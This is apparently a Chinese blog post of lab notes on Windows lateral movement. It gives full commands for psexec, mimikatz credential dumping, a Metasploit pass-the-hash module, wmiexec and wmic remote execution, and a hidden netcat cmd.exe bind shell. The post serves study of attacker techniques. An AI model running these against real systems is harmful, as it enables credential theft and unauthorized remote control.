Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了
2023-09-14 09:11:47 时间
环境:Win10、Win7虚拟机
Windows远程命令执行
1、psexec.exe远程执行命令
psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe
这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。
2、使用Hash登陆Windows
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
或者使用wce抓取hash值:
msf调用payload:
-
use exploit/windows/smb/psexec
-
show options
-
set RHOST 192.168.30.128
-
Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
-
set SMBUser Administrator
-
show options
-
Run
3、利用wmiexec工具配合进行反弹半交互shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789
还可以单条命令执行
4、WMI执行命令方式,无回显
wmic /node:192.168.30.128 /user:Administrator /password:123456789 process call create "cmd.exe /c ipconfig>c:\result.txt"
执行成功后可以在被控制的机器里面找到执行结果的文件
5、nc远程执行
先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口
nc.exe -L -d -e cmd.exe -p 5555
控制端运行nc64.exe 192.168.30.128 5555
相关文章
- 通过cmd 使用 InstallUtil.exe 命令 操作 windows服务 Windows Service
- windows服务控制类
- Env:Gvim开发环境配置笔记--Windows篇
- Windows操作系统远程Linux服务器传输文件方法(以EasyDSS云平台、EasyNVR上传部署为例)
- 深入详解windows安全认证机制ntlm&Kerberos
- MFC Windows 程序设计[191]之多形状按钮组(附源码)
- MFC Windows 程序设计[231]之拖拽编辑框(附源码)
- Windows 查看端口是被什么程序占用
- 使用VM Tools让VMware虚拟机里的ubuntu能够共享Windows系统的文件夹
- Anaconda在windows环境下走代理
- TOSCA自动化测试工具--How to modify windows
- chromium在windows上的编译 构建 Checking out and Building Chromium for Windows
- Windows创建的基本含义和进程的进程的内核
- 常见的windows下无文件落地攻击手法——主要讨论了powershell脚本、HTA是HTML Application的缩写(HTML应用程序)、xml中利用COM组件、certutil下载然后调用Dcom组件执行恶意代码、msxsl.exe是微软用于命令行下处理XSL的可以执行JavaScript执行系统命令
- web端调起Windows系统应用程序(exe执行文件),全面兼容所有浏览器
- windows 进程执行cmd
- windows和linux平台下文件读写r、rb、w、wb对换行符的处理操作
- Windows文件名区分大小写